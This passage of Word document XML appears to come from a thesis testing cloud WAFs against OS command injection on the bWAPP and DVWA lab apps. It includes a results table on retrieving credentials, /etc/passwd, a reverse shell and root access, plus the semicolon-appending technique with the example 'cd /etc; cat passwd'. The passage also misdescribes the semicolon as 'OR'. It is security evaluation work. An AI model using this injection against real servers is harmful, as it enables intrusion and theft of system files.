            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C91C908" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>DB credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FDA09CE" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB6EBC5" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="467FA66E" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="4B18EEFA" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F477785" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C0F2BF" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C2D6387" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444FF93A" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="6E86EADB" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1694BC8C" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63120486" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45447553" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E55D986" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="4E1E294B" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48ECB318" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B9F69F9" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB14F85" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464487E5" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="789B5FCA" w14:textId="5494B6B1" w:rsidR="006A6BB2" w:rsidRDefault="006A6BB2" w:rsidP="006A6BB2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc71138547"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52E67">
        <w:t>Further exploitation results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="36A68FBE" w14:textId="120CFEC2" w:rsidR="002B0490" w:rsidRPr="00DE6606" w:rsidRDefault="002B0490" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The results in Table </w:t>
      </w:r>
      <w:r w:rsidR="006A6BB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> showed that Imperva’s and Cloudflare’s cloud WAFs were unable to block </w:t>
      </w:r>
      <w:r w:rsidR="00643260">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts to obtain access or information from the server via the vulnerable web applications</w:t>
      </w:r>
      <w:r w:rsidR="00A43436">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> using OS command injection, PHP code injection or combination of both</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4ACE7" w14:textId="69523AAF" w:rsidR="00C4120E" w:rsidRPr="00DE6606" w:rsidRDefault="00C4120E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">-related information </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">were able to be retrieved </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>through OS commands</w:t>
      </w:r>
      <w:r w:rsidR="003462E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are not blocked by the WAFs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The commands were successful via both</w:t>
      </w:r>
      <w:r w:rsidR="004E0C7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> bWAPP’s and DVWA’s OS command injection page. The commands could be appended after adding a semicolon (;) after the domain/IP address. The semicolon indicates ‘OR’ which instructs the computer to run the command(s) which come after. During </w:t>
      </w:r>
      <w:r w:rsidR="00374773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>some manual</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> tests, it was found that only two semicolons</w:t>
      </w:r>
      <w:r w:rsidR="00374773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be included in a single request,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> which allowed two commands</w:t>
      </w:r>
      <w:r w:rsidR="00374773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be passed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> per request. However, each command is independent and will not continue from the previous command. For example, “cd /etc; cat passwd” did not work. It would change its directory to /etc and then concatenate the file passwd as it would in a normal terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE818E" w14:textId="4324EBC9" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="00742E3A" w:rsidP="00742E3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc71138507"/>
      <w:r>
        <w:t xml:space="preserve">4.4.6 </w:t>
      </w:r>
      <w:r w:rsidR="008733A7" w:rsidRPr="00DE6606">
        <w:t>PHP code injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="3080CBDE" w14:textId="281B8B5A" w:rsidR="008733A7" w:rsidRDefault="002A3BD2" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
